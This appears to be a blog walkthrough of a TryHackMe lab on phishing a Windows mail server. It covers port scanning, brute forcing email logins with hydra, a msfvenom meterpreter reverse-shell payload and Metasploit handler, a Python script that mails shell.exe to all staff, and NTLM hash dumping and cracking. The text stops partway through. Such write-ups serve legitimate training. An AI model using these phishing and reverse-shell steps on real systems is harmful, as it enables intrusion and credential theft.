Test your recon and phishing skills in order to complete your objective.
into.
Welcome everyone today i want to go through this Try Hack Me machine its name is quite interesting i do not like Windows machine often but this one seems interesting let's dive into it.
Port scanning.
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
110/tcp open pop3 syn-ack hMailServer pop3d
|_pop3-capabilities: USER UIDL TOP
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
143/tcp open imap syn-ack hMailServer imapd
|_imap-capabilities: QUOTA CHILDREN SORT RIGHTS=texkA0001 CAPABILITY OK IDLE completed IMAP4 ACL IMAP4rev1 NAMESPACE
445/tcp open microsoft-ds? syn-ack
587/tcp open smtp syn-ack hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49670/tcp open msrpc syn-ack Microsoft Windows RPC
49672/tcp open msrpc syn-ack Microsoft Windows RPC
49674/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: BRICK-MAIL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-02-20T03:30:16
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 41825/tcp): CLEAN (Couldn't connect)
| Check 2 (port 56260/tcp): CLEAN (Couldn't connect)
| Check 3 (port 64713/udp): CLEAN (Failed to receive data)
| Check 4 (port 56873/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
Look like typical windows machine unless it has SMTP, and POP3 which both are used for emails.
The website.
So in the machine instruction we can see that there is a domain assign to us to enumerate. But passively.
You are a penetration tester who has recently been requested to perform a security assessment for Brik. You are permitted to perform active assessments on MACHINE_IP and strictly passive reconnaissance on brownbrick.co. The scope includes only the domain and IP provided and does not include other TLDs.
in the website there is nothing interesting but these emails and names. I tried to preform some OSINT on these people but nothing i came with.
Then i check Mr. Bob walk-through to understand that we can use cewl which is a tool used for gathering password list from a website. You can check more here.
To get the password list.
cewl --lowercase https://brownbrick.co/ > passwords.txt
using hydra we can brute force the emails we find hoping to get something
And as you can see we get valid credential now we can send some emails using sendEmail.
But first we need some sort of payload to get shell on the target system i used msfvenom to generate that but you can use what ever you want as long as its exe file.
Generate the reverse shell.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.96.110 LPORT=8888 -f exe -o shell.exe
setting metasploit to accept the connection.
msfconsole
use multi/handler
set lhost <your interface name>
set lport <port from the msfvenom>
set payload windows/meterpreter/reverse_tcp
exploit
i used this python code to automate the sending process for all the emails.
import subprocess
emails = "oaurelius@brownbrick.co tchikondi@brownbrick.co pcathrine@brownbrick.co stamatis@brownbrick.co wrohit@brownbrick.co"
email_list = emails.split(" ")
for i in email_list:
cmd = f'sendEmail -f "lhedvig@brownbrick.co" -t {i} -u "test" -m "test" -a shell.exe -s 10.10.156.238:25 -xu "lhedvig@brownbrick.co" -xp "bricks"'
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
print(f"Email sent to: {i}, Output: {result.stdout}, Error: {result.stderr}")
once we run this and make sure it sending the emails successfully we now wait for the connection.
Now we can navigate to the home of the user wrohit.
Wrohit password.
from out same meterperter session we can use hashdump to get the ntlm hashes.
Let's crack it with john.
john --wordlist=../../Downloads/rockyou.txt ./hashes --format=nt
Administrator password.
Lastly it ask us about the Administrator dashboard password.
This one quite simple searching a bit there are two interesting files for hMailServer.
